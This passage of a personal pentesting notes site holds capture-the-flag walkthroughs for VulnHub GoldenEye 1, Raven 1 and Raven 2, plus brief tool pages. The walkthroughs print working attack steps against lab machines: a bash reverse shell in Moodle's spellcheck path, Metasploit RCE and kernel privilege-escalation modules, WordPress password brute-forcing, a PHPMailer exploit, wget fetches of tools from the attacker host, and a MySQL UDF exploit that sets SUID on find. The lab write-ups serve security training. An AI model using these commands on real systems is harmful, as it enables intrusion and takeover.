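# On the attacker machine\nnc -lnvp 4444\n\n# Value to place in the spellcheck engine path setting in Moodle,\n# triggered when clicking the \"Check spelling\" button:\nsh -c '/bin/bash -i >& /dev/tcp/192.168.56.102/4444 0>&1'\n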

        I'm not a big fan of metasploit, but in this case I've used it.

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#eight-metasploit-geting-a-shell","title":"Eight: Metasploit, geting a shell","text":"

        Module multi/http/moodle_spelling_binary_rce

I've employed the module multi/http/moodle_spelling_binary_rce. Basically, Moodle allows an authenticated user to define spellcheck settings via the web interface. The user can update the spellcheck mechanism to point to a system-installed aspell binary. By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the context of the web application upon spellchecking requests. This module also allows an attacker to leverage another privilege escalation vuln. Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey and use this to escalate privileges to that of an admin, allowing the module to pop a shell as a previously unprivileged authenticated user. This module was tested against Moodle versions 2.5.2 and 2.2.3. A usage sketch follows the references below.

        • https://nvd.nist.gov/vuln/detail/CVE-2013-3630
        • https://nvd.nist.gov/vuln/detail/CVE-2013-4341
        • https://www.exploit-db.com/exploits/28174
        • https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats
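
As promised, a minimal msfconsole sketch for this module. The option names are written from memory and may differ between Metasploit versions, so confirm them with show options; LHOST assumes our attacker machine sits at 192.168.56.102, as in the other labs in this repo:

msfconsole\nuse exploit/multi/http/moodle_spelling_binary_rce\nset RHOSTS severnaya-station.com\nset TARGETURI /gnocertdir\nset USERNAME admin\nset PASSWORD xWinter1995x!\nset LHOST 192.168.56.102\nrun\n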

        Now, we move our session to background with CTRL-z.

        Module post/multi/manage/shell_to_meterpreter

Our goal now is to move from a cmd/unix shell to a more capable Meterpreter session. This will allow us later on to execute a Metasploit module to escalate privileges.

        search shell_to_meterpreter\n

        We'll be using the module \"post/multi/manage/shell_to_meterpreter\".

We only need to set SESSION and LHOST.
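
For instance (a sketch, assuming our initial shell is session 1 and our attacker IP is 192.168.56.102):

use post/multi/manage/shell_to_meterpreter\nset SESSION 1\nset LHOST 192.168.56.102\nrun\n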

        If everything is ok, now we'll have two sessions.

        We've done this to be able to escalate privileges, since the session with shell cmd/unix didn't allow us to escalate privileges using exploit/linux/local/overlayfs_priv_esc.

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#escalating-privileges","title":"Escalating privileges","text":"

        Module exploit/linux/local/overlayfs_priv_esc

We'll be using this module to escalate privileges. How did we get here? We ran:

        uname -a\n

        Results:

        Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux\n

        Now, after googling \"exploit escalate privileges ubuntu 3.13.0\", we get:

        • https://www.exploit-db.com/exploits/37292.
        • https://www.rapid7.com/db/modules/exploit/linux/local/overlayfs_priv_esc/.

Either of these ways of exploiting GoldenEye 1 is fine. If you go for the first option and upload the exploit to the machine, you will soon realize that the victim machine does not have the gcc compiler installed, so you will need to use the cc compiler (and modify the code of the exploit). As for the second option, which I chose, Metasploit is not going to work with the cmd/unix session. The error message is similar: gcc is not installed and the code cannot be compiled. You will need to set the Meterpreter session for this attack to succeed.
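
As a sketch of the first option: the public 37292.c exploit shells out to gcc (via system()) to build a helper library, so the quickest edit, assuming the exploit only references gcc in that call, is to swap the compiler name before uploading:

# Replace the hardcoded gcc invocation inside the exploit with cc\nsed -i 's/gcc/cc/g' 37292.c\n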

The module exploit/linux/local/overlayfs_priv_esc attempts to exploit two different CVEs related to overlayfs:

• CVE-2015-1328 (Ubuntu specific): 3.13.0-24 (14.04 default) < 3.13.0-55; 3.16.0-25 (14.10 default) < 3.16.0-41; 3.19.0-18 (15.04 default) < 3.19.0-21
• CVE-2015-8660: Ubuntu: 3.19.0-18 < 3.19.0-43; 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10). Fedora: < 4.2.8 (vulnerable, un-tested). Red Hat: < 3.10.0-327 (rhel 6, vulnerable, un-tested).

        To exploit it, we need to use session 2.
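
In msfconsole that boils down to something like the following (option names from memory; confirm with show options; LHOST assumes the attacker IP 192.168.56.102):

use exploit/linux/local/overlayfs_priv_esc\nset SESSION 2\nset LHOST 192.168.56.102\nrun\n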

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#last-getting-the-flag","title":"Last, getting the flag","text":"

        Now, we can cat the flag:

        cat .flag.txt\nAlec told me to place the codes here: \n\n568628e0d993b1973adc718237da6e93\n\nIf you captured this make sure to go here.....\n/006-final/xvf7-flag/\n

Isn't it just fun???

        ","tags":["walkthrough"]},{"location":"vulnhub-raven-1/","title":"Walkthrough: Raven 1, a vulnhub machine","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#about-the-machine","title":"About the machine","text":"data Machine Raven 1 Platform Vulnhub url link Download https://drive.google.com/open?id=1pCFv-OXmknLVluUu_8ZCDr1XYWPDfLxW Download Mirror https://download.vulnhub.com/raven/Raven.ova Size 1.4 GB Author William McCann Release date 14 August 2018 Description Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networking. Difficulty Beginner/Intermediate OS Linux","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#walkthrough","title":"Walkthrough","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#setting-up-the-machines","title":"Setting up the machines","text":"

        I'll be using Virtual Box.

        Kali machine (from now on: attacker machine) will have two network interfaces:

        • eth0 interface: NAT mode (for internet connection).
        • eth1 interface: Host-only mode (for attacking the victim machine).

        Raven 1 machine (from now on: victim machine) will have only one network interface:

        • eth0 interface.

        After running

        ip a\n
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#reconnaissance","title":"Reconnaissance","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#identify-victims-ip","title":"Identify victim's IP","text":"

We know that the attacker's machine IP address is 192.168.56.102/24. To discover the victim's machine IP, we run:

        sudo netdiscover -i eth1 -r 192.168.56.102/24\n

        These are the results:

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#scan-victims-surface-attack","title":"Scan victim's surface attack","text":"

        Now we can run a scanner to see which services are running on the victim's machine:

        sudo nmap -p- -A 192.168.56.104\n

        And the results:

Having a web server on port 80, it's inevitable to open a browser and have a look at it. Also, at the same time, we can run a simple enumeration scan:

        dirb http://192.168.56.104\n

        The results are pretty straightforward:

There is a WordPress installation (maybe not fully configured) running on the server. There are also some services installed, such as PHPMailer.

        By reviewing the source code in the pages we find the first flag:

        Here, flag1 in plain text:

        <!-- End footer Area -->        \n            <!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->\n
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#deeper-scan-with-specific-tool-for-wordpress-service-wpsca","title":"Deeper scan with specific tool for wordpress service: wpsca","text":"

First, let's start by running a much deeper scan with wpscan. We'll be enumerating users:

        wpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\n

        And the results show us some interesting findings:

First, one thing that may be useful later: XML-RPC seems to be enabled: http://192.168.56.104/wordpress/xmlrpc.php. What does this service do? It allows authenticated users to post entries. It's also used in WordPress for receiving pingbacks when a post is linked. This means it's also an open door for exploitation. We'll return to this later.

        Opening the browser in http://192.168.56.104/wordpress/readme.html, we can see some instructions to set up the wordpress installation.

        As a matter of fact, by clicking on http://192.168.56.104/wp-admin/install.php, we end up on a webpage like this:

Nice, so the link button is giving us a tip: we need to add a hostname mapping to our /etc/hosts file.

        sudo nano /etc/hosts\n

        At the end of the file we add the following line:

192.168.56.104  raven.local\n# CTRL-s  and CTRL-x\n

Now we can browse the WordPress site perfectly. Also, once our wpscan finishes, there are two more interesting findings:

        These findings are:

        • Wordpress: WordPress version 4.8.7 identified (Insecure, released on 2018-07-05).
        • User enumeration: steven and michael.

        We can also detect those users manually, simply by brute-forcing the author enumeration. See screenshot:

        To manually brute force users in a wordpress installation, you just need to go to:

        • targetURL/?author=1

The author with id=1 (as in the example) is the first user created during the CMS installation, which usually coincides with the admin user. To see the next user, you just need to change the number; IDs are sequential. By checking the source code (as in the previous screenshot) you can gather users (steven and michael), but also the WordPress version (4.8.7) and theme (TwentySeventeen).
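
This check can also be scripted. WordPress typically answers /?author=N with a redirect whose Location header leaks the username, so a quick sketch (IDs and path as in this lab) would be:

for i in 1 2 3; do curl -s -I \"http://192.168.56.104/wordpress/?author=$i\" | grep -i '^location'; done\n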

        So, what do we have so far?

        • Server: Apache/2.4.10 (Debian)
        • CMS: WordPress version 4.8.7 identified (Insecure, released on 2018-07-05)
        • Theme: twentySeventeen
        • XML-RPC seems to be enabled: http://192.168.56.104/wordpress/xmlrpc.php.
        • Login page: http://raven.local/wordpress/wp-login.php
        • Two users: steven, michael.
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#exploiting-findings","title":"Exploiting findings","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#bruce-forcing-passwords-for-the-cms","title":"Bruce-forcing passwords for the CMS","text":"

Not having found anything else after testing input validation on the endpoints of the application, I'm going to try to brute force the login for steven, who is the user with id=2.

        wpscan --url http://192.168.56.104/wordpress --passwords /usr/share/wordlists/rockyou.txt  --usernames steven -t 25\n

Results:

        Now, we have:

        • user: steven
        • password: pink84

        These credentials are good to login into the wordpress and... retrieve flag3!!!

        Flag3 was hidden in the draft of a post. Here, in plain text:

        flag3{afc01ab56b50591e7dccf93122770cd2}\n
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#using-credentials-found-for-wordpress-in-a-different-service-ssh","title":"Using credentials found for wordpress in a different service (ssh)","text":"

It's not uncommon to use the same usernames and passwords across services. So, having found steven's password for WordPress, we may try to use the same credentials in a different service. Therefore, we will try to access port 22 (which was open) and see if these creds are valid:

        ssh steven@192.168.56.104\n

After confirming the host key fingerprint, we are asked to enter steven's password, and... it works!

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#escalation-of-privileges","title":"Escalation of privileges","text":"

We can see who we are (id), which groups we belong to (id), the kernel version (uname -a), and which commands we are allowed to run (sudo -l). And here comes the juicy part. As you may see in the screenshot, we can run the command python as root without entering a password.

        Resources: This site is a must when it comes to Unix binaries that can be used to bypass local security restrictions https://gtfobins.github.io

        In particular, we can easily spot this valid exploit: https://gtfobins.github.io/gtfobins/python/#sudo. What does it say about python? If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

        This is just perfect. So to escalate to root we just need to run:

        sudo python -c 'import os; os.system(\"/bin/sh\")'\n

        See the results:

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#getting-the-flags","title":"Getting the flags","text":"

        Printing flags now is not difficult at all:

find . -name \"flag*.txt\" 2>/dev/null\n

        And results:

        ./var/www/flag2.txt\n./root/flag4.txt\n

        We can print them now:

        cat /var/www/flag2.txt\n
        Results:

        flag2{fc3fd58dcdad9ab23faca6e9a36e581c}\n
        cat /root/flag4.txt\n

        Results:

        ______                      \n\n| ___ \\                     \n\n| |_/ /__ ___   _____ _ __  \n\n|    // _` \\ \\ / / _ \\ '_ \\ \n\n| |\\ \\ (_| |\\ V /  __/ | | |\n\n\\_| \\_\\__,_| \\_/ \\___|_| |_|\n\n\nflag4{715dea6c055b9fe3337544932f2941ce}\n\nCONGRATULATIONS on successfully rooting Raven!\n\nThis is my first Boot2Root VM - I hope you enjoyed it.\n\nHit me up on Twitter and let me know what you thought: \n\n@mccannwj / wjmccann.github.io\n

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#commands-and-tools","title":"Commands and tools","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#commands-used-to-exploit-the-machine","title":"Commands used to exploit the machine","text":"
sudo netdiscover -i eth1 -r 192.168.56.102/24\nsudo nmap -p- -A 192.168.56.104\ndirb http://192.168.56.104\nwpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\necho \"192.168.56.104    raven.local\" | sudo tee -a /etc/hosts\nwpscan --url http://192.168.56.104/wordpress --passwords /usr/share/wordlists/rockyou.txt  --usernames steven -t 25\nssh steven@192.168.56.104\nsudo python -c 'import os; os.system(\"/bin/sh\")'\nfind . -name \"flag*.txt\" 2>/dev/null\n
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#tools","title":"Tools","text":"
        • dirb.
        • netdiscover.
        • nmap.
        • wpscan.
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/","title":"Walkthrough: Raven 2, a vulnhub machine","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#about-the-machine","title":"About the machine","text":"data Machine Raven 2 Platform Vulnhub url link Download https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23z Download Mirror https://download.vulnhub.com/raven/Raven2.ova Size 765 MB Author William McCann Release date 9 November 2018 Description Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven? Difficulty Intermediate OS Linux","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#walkthrough","title":"Walkthrough","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#setting-up-the-machines","title":"Setting up the machines","text":"

        I'll be using Virtual Box.

        Kali machine (from now on: attacker machine) will have two network interfaces:

        • eth0 interface: NAT mode (for internet connection).
        • eth1 interface: Host-only mode (for attacking the victim machine).

        Raven 1 machine (from now on: victim machine) will have only one network interface:

        • eth0 interface.

        After running

        ip a\n
        we know that the attacker's machine IP address is 192.168.56.102/24.

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#reconnaissance","title":"Reconnaissance","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#identify-victims-ip","title":"Identify victim's IP","text":"

        To discover the victim's machine IP, we run:

        sudo netdiscover -i eth1 -r 192.168.56.102/24\n

        These are the results:

Usually, the victim's IP is the last one listed, in this case 192.168.56.104, BUT as this lab was performed over several days, the victim's machine IP will eventually switch to 192.168.56.105.

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#scan-victims-surface-attack","title":"Scan victim's surface attack","text":"

        Now we can run a scanner to see which services are running on the victim's machine:

        sudo nmap -p- -A 192.168.56.104\n

        And the results:

Having a web server on port 80, it's inevitable to open a browser and have a look at it. Also, at the same time, we can run a simple enumeration scan with dirb:

        dirb http://192.168.56.104\n
        By default, dirb is using /usr/share/dirb/wordlists/common.txt. The results are pretty straightforward:

There are two quite appealing folders:

        • A wordpress installation running on the server.
        • A vendor installation with a service such as PHPMailer installed.
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#deeper-scan-with-specific-tool-for-wordpress-service-wpscan","title":"Deeper scan with specific tool for wordpress service: wpscan","text":"

First, let's start by running a much deeper scan with wpscan. We'll be enumerating users:

        wpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\n

        And the results show us some interesting findings:

        Main findings:

• XML-RPC seems to be enabled: http://192.168.56.104/wordpress/xmlrpc.php. What does this service do? It allows authenticated users to post entries. It's also used in WordPress for receiving pingbacks when a post is linked. This means that it's also an open door for exploitation. We'll return to this later.
        • WordPress readme found: http://raven.local/wordpress/readme.html
        • Upload directory has listing enabled: http://raven.local/wordpress/wp-content/uploads/.
        • WordPress version 4.8.7.
        • WordPress theme in use: twentyseventeen.
        • Enumerating Users: michael, steven.

Opening the browser at http://192.168.56.104/wordpress/readme.html, we can see some instructions to set up the WordPress installation. As a matter of fact, by clicking on http://192.168.56.105/wp-admin/install.php, we end up on a webpage with the source code pointing to raven.local. We need to add a hostname mapping to our /etc/hosts file. (This is better explained in the Vulnhub Raven 1 walkthrough.)

        sudo nano /etc/hosts\n

        At the end of the file we add the following line:

192.168.56.104  raven.local\n# CTRL-s  and CTRL-x\n

There was another open folder: http://raven.local/wordpress/wp-content/uploads/. Using the browser we can get to it:

        And now we have flag3:

Let's now look at the user enumeration. You can go to the walkthrough of the Vulnhub Raven 1 machine to see how to manually brute force users in a WordPress installation.

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#exploiting-findings","title":"Exploiting findings","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#bruce-forcing-passwords-for-the-cms","title":"Bruce-forcing passwords for the CMS","text":"

Not having found anything else after testing input validation on the endpoints of the application, I'm going to try to brute force the login for steven, who is the user with id=2.

        wpscan --url http://192.168.56.105/wordpress --passwords /usr/share/wordlists/rockyou.txt  --usernames steven -t 25\n

        And also with michael:

        wpscan --url http://192.168.56.105/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames michael -t 25\n

        No valid password is found.

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#browse-listable-folders-that-are-supposed-to-be-close","title":"Browse listable folders that are supposed to be close","text":"

        Besides the wordpress installation, our dirb scan gave us another interesting folder: http://192.168.56.105/vendor. Browsing around you can find the service PHPMailer installed.

Two interesting findings regarding the PHPMailer service:

One is the file PATH, with the path to the service and another of the flags:

        In plain text:

        /var/www/html/vendor/\nflag1{a2c1f66d2b8051bd3a5874b5b6e43e21}\n

The second is the file VERSION, which reveals that the PHPMailer service is version 5.2.16, which is potentially vulnerable.

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#exploiting-the-service-phpmailer-5216","title":"Exploiting the service PHPMailer 5.2.16","text":"

        After googling \"phpmailer 5.2.16 exploit\", we have these results:

        • https://www.exploit-db.com/exploits/40974.

        What is this vulnerability about? Quoting Legalhackers:

        An independent research uncovered a critical vulnerability in PHPMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class.

When it comes to the Raven 2 machine, we realize that the site uses a contact form:

        We can use the exploit from https://www.exploit-db.com/exploits/40974.

This is the original exploit (with the fields we're going to change highlighted):

And this is anarconder.py, saved with execution permissions on our attacker machine (my changes to the original script are highlighted):

        We launch the script:

        python3 anarconder.py\n

And open port 4444 in listening mode with netcat:

nc -lnvp 4444\n

Now, I will open http://192.168.56.105/zhell.php in the browser to get the reverse shell in my netcat connection.

        And we can browse to /var/www and get flag2.txt

        flag2.txt in plain text:

        flag2{6a8ed560f0b5358ecf844108048eb337}\n

Also, a nice thing to do on every WordPress installation is checking for credentials in the config file (if it exists). So by browsing to /var/www/html/wordpress, we can see:

        And reading the file, we can see some credentials:

        cat wp-config.php\n

        So now we also have these credentials:

        • user: root
        • password: R@v3nSecurity

We can try to access the SSH service running on port 22 with those credentials, without success. We can also try to escalate from the open shell, but we get the message that "su root must be run from terminal".

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#escalation-of-privileges","title":"Escalation of privileges","text":"

First, let's see who we are (id), which groups we belong to (id), the kernel version (uname -a), and which commands we are allowed to run (sudo -l).

There are also some nice tools that we could run on the victim machine if we have Python installed. Let's check:

        which python\n
        Result:

        /usr/bin/python\n

Nice, let's proceed. There is a cool enumeration tool for Linux called Linux Privilege Checker, which we can download from the referenced GitHub repo and serve from our attacker machine:

        cp linuxprivchecker.py /var/www/html\ncd /var/www/html\nservice apache2 start\n

        And then, from the victim machine:

        cd /tmp\nwget http://192.168.56.102/linuxprivchecker.py\n

        Now we can run it and see the results:

        python /tmp/linuxprivchecker.py\n

Once you run it, you will get this enumeration of escalation exploits. Since we potentially have root credentials for a service, we will try the MySQL 4.x/5.0 vulnerability.

After reviewing the exploit http://www.exploit-db.com/exploits/1518, we copy-paste it and save it as 1518.c on our Apache server:

        cd /var/www/html/\nvi 1518.c\n# and we copy paste the exploit\n

Compiling this C code on the victim machine gives us an error.

Then, we are going to compile it on the attacker machine.

# To create 1518.o from 1518.c\nsudo gcc -g -c 1518.c\n\n# To create 1518.so from both 1518.c and 1518.o\nsudo gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc \n

The file the victim machine is going to retrieve is 1518.so. So, from /tmp on the victim machine:

        cd /tmp\nwget http://192.168.56.102/1518.so\n

Now, on the victim machine, we log into the MySQL service:

        mysql -u root -p\n\n# when asked about password, we enter R@v3nSecurity\n

        We're in! Let's do some digging:

        # List databases\nSHOW databases;\n\n# Select a database\nuse mysql;\n

Exploiting the vulnerability: we'll create a table in the database with a single column, and we'll insert into that column the contents of our .so payload file.

        create table foo(line blob);\ninsert into foo values(load_file('/tmp/1518.so'));\n

        So far:

![Mysql capture](img/raven2-19.png)

Now, we are going to dump that file from the column to a different location, let's say /usr/lib/mysql/plugin/1518.so:

        select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';\n\n# We will execute\ncreate function do_system returns integer soname '1518.so';\n

        If we now execute:

        select do_system('chmod u+s /usr/bin/find');\nexit\n

        Now, if we check suid binaries, we can see \"find\" among them.
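
For instance, a common way to list SUID binaries:

find / -perm -4000 -type f 2>/dev/null\n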

Now, if we create a file, such as "tocado", in the /tmp folder of the victim machine and run find file -exec command, the command passed to -exec will be executed as root every time find matches the file, because find now carries the SUID bit.

        Then, we can run:

        touch tocado\nfind tocado -exec \"whoami\" \\;\nfind tocado -exec \"/bin/sh\" \\;\nwhoami\n

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#getting-the-flag","title":"Getting the flag","text":"

        We just need to go to the root folder:

        cd /root\nls -la\ncat flag4.txt\n

        flag4.txt in plain text:

          ___                   ___ ___ \n | _ \\__ ___ _____ _ _ |_ _|_ _|\n |   / _` \\ V / -_) ' \\ | | | | \n |_|_\\__,_|\\_/\\___|_||_|___|___|\n\nflag4{df2bc5e951d91581467bb9a2a8ff4425}\n\nCONGRATULATIONS on successfully rooting RavenII\n\nI hope you enjoyed this second interation of the Raven VM\n\nHit me up on Twitter and let me know what you thought: \n
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#commands-used-to-exploit-the-machine","title":"Commands used to exploit the machine","text":"
ip a\nsudo netdiscover -i eth1 -r 192.168.56.102/24\nsudo nmap -p- -A 192.168.56.105\ndirb http://192.168.56.105\nwpscan --url http://192.168.56.105/wordpress --enumerate u --force --wp-content-dir wp-content\npython3 anarconder.py\nnc -lnvp 4444\n\ncat wp-config.php\ncd /tmp\nwget http://192.168.56.102/linuxprivchecker.py\npython /tmp/linuxprivchecker.py\n\n\ncd /var/www/html/\nvi 1518.c\n# and we copy paste the exploit\n\n# To create 1518.o from 1518.c\nsudo gcc -g -c 1518.c\n\n# To create 1518.so from both 1518.c and 1518.o\nsudo gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc \n\nmysql -u root -p\n\n# List databases\nSHOW databases;\n\n# Select a database\nuse mysql;\n\ncreate table foo(line blob);\ninsert into foo values(load_file('/tmp/1518.so'));\n\nselect * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';\n\n# We will execute\ncreate function do_system returns integer soname '1518.so';\n\nselect do_system('chmod u+s /usr/bin/find');\nexit\n\ntouch tocado\nfind tocado -exec \"whoami\" \\;\nfind tocado -exec \"/bin/sh\" \\;\nwhoami\n
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-2/#tools","title":"Tools","text":"
        • dirb.
        • netdiscover.
        • nmap.
        • wpscan.
        • mysql
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"w3af/","title":"w3af","text":"

        w3af is a\u00a0Web Application Attack and Audit Framework.

        ","tags":["pentesting","web pentesting"]},{"location":"w3af/#installation","title":"Installation","text":"

        Download from: https://github.com/andresriancho/w3af.

        W3af documentation.

        ","tags":["pentesting","web pentesting"]},{"location":"wafw00f/","title":"WafW00f - A firewall scanner","text":"

        WafW00f is a web application firewall (WAF) fingerprinting tool that sends requests and analyses responses to determine if a security solution is in place.

        WAFW00F does the following:

        • Sends a\u00a0normal\u00a0HTTP request and analyses the response; this identifies a number of WAF solutions.
        • If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is.
        • If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.
        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"wafw00f/#installation","title":"Installation","text":"

        We can install it with the following command:

        sudo apt install wafw00f -y\n
        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"wafw00f/#basic-usage","title":"Basic usage","text":"
        wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n
        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"walkthroughs/","title":"Index of walkthroughs","text":"","tags":["walkthrough"]},{"location":"walkthroughs/#well-this-is-a-mess","title":"Well, this is a mess","text":"

        It feels like an eternity since I embarked on my first walkthroughs of the Overthewire game challenges. However, the reality is that this happened just one year ago (or maybe two). During those days, I was consumed by an intense obsession with documenting every single step I took. Allow me to relive and share a snippet of my explanation for progressing from level 31 to level 32 in Bandit so you can draw your own conclusions:

        Click to keep reading why this is a mess
        1. mkdir /tmp/amanda31\n2. cd /tmp/amanda31\n3. git clone ssh://bandit31-git@localhost/home/bandit31-git/repo\n4. cd repo\n\n# when listing repo, you can realize that there is a .gitignore file\n5. ls -la\n\n# Print the .gitignore file to see which changes are not being commited\n6. cat .gitignore\n\n# \"*.txt\" files are being excluded from being pushed\n7. cat README.md\n\n# README.md file will provide you with the instructions to pass the level: \"This time your task is to push a file to the remote repository.\n# Details:\n#    File name: key.txt\n#    Content: 'May I come in?'\n#    Branch: master  \"\n\n# Remove \"*.txt\" from .gitignore\"\n8. echo \"\" > .gitignore\n\n# Create a key.txt file\n9. echo \"May I come in?\" > ./.git/key.txt\n\n# Add these changes to the commit\n10. git add -A\n\n# Commit the changes in your repository. A line with the explanation of the changes may be required\n11. git commit\n\n# Push the changes to the server\n12. git push\n\n# In the results of the git push commands, the server will \n# provide the password for the next level.\n

        Smile on my face. I even commented what \"git push\" or \"cat file.txt\" were executing! XDDDDDDDD

        I also vividly remember spending A LOT of time doing this. But you know what? I don't care what my colleagues say. All that time was completely worthwhile because it helped me integrate that knowledge into my tired brain. Take, for instance, the walkthrough of vulnhub Goldeneye 1. It took me a while to format and prepare it for sharing (and I did it with the intention of sharing).

        Now things have changed. I don't do that anymore. I've become selfish. My walkthroughs have transformed into a list of steps linked to tools, tags and concise explanations, solely for the purpose of helping me remember that machine. They are probably only useful to me (not suitable for LinkedIn hahaha).

        Anyway, at some point, I needed to make this decision. More labs and self-centered documentation? Or more detailed walkthroughs and fewer labs (and consequently falling behind on my goals)? More labs, geee!

        All of this is just to say that in this repository, you will find incredibly detailed walkthroughs (even with multiple ways of exploiting a machine) along with quick guides containing raw commands. All of them together and for no reason. Please, bear with me!

        ","tags":["walkthrough"]},{"location":"walkthroughs/#updated-list-of-walkthroughs-writeups","title":"Updated list of walkthroughs - writeups","text":"
        • Vulnhub GoldenEye 1
        • Vulnhub Raven 1
        • Vulnhub Raven 2
        • HTB appointment
        • HTB archetype
        • HTB bank
        • HTB base
        • HTB crocodile
        • HTB explosion
        • HTB friendzone
        • HTB funnel
        • HTB included
        • HTB ignition
        • HTB lame
        • HTB markup
        • HTB metatwo
        • HTB mongod
        • HTB nibbles
        • HTB nunchucks
        • HTB omni
        • HTB oopsie
        • HTB pennyworth
        • HTB photobomb
        • HTB popcorn
        • HTB redeemer
        • HTB responder
        • HTB sequel
        • HTB support
        • HTB tactics
        • HTB trick
        • HTB undetected
        • HTB unified
        • HTB usage
        • HTB vaccine
        ","tags":["walkthrough"]},{"location":"waybackurls/","title":"waybackurls","text":"

waybackurls inspects URLs saved by the Wayback Machine and looks for specific keywords.

        ","tags":["pentesting","reconnaissance","tools"]},{"location":"waybackurls/#installation","title":"Installation","text":"
        go install github.com/tomnomnom/waybackurls@latest\n
        ","tags":["pentesting","reconnaissance","tools"]},{"location":"waybackurls/#basic-usage","title":"Basic usage","text":"
        waybackurls -dates https://example.com > waybackurls.txt\n\ncat waybackurls.txt\n
        ","tags":["pentesting","reconnaissance","tools"]},{"location":"web-services/","title":"Pentesting web services","text":"","tags":["pentesting","webservices","soap"]},{"location":"web-services/#web-services-vs-web-applications","title":"Web services vs. Web applications","text":"
        • Interoperability: Web services promote interoperability by providing a standardized way for applications to communicate. They rely on open standards like HTTP, XML, SOAP, REST, and JSON to ensure compatibility.
        • Platform-agnostic: Web services are not tied to a specific operating system or programming language. They can be developed in various technologies, making them versatile and accessible.
        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#web-services-vs-apis","title":"Web services vs. APIs","text":"

        Web services and APIs (Application Programming Interfaces) are related concepts in web development, but they have distinct differences. Web services are a broader category of technologies used to enable machine-to-machine communication and data exchange over the internet. They encompass various protocols and data formats. APIs, on the other hand, are a set of rules and tools that allow developers to access the functionality or data of a service, application, or platform.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#implementation-of-web-services","title":"Implementation of web services","text":"

        Web service implementations refer to the different ways in which web services can be created, deployed, and used. There are several methods and technologies available for implementing web services.

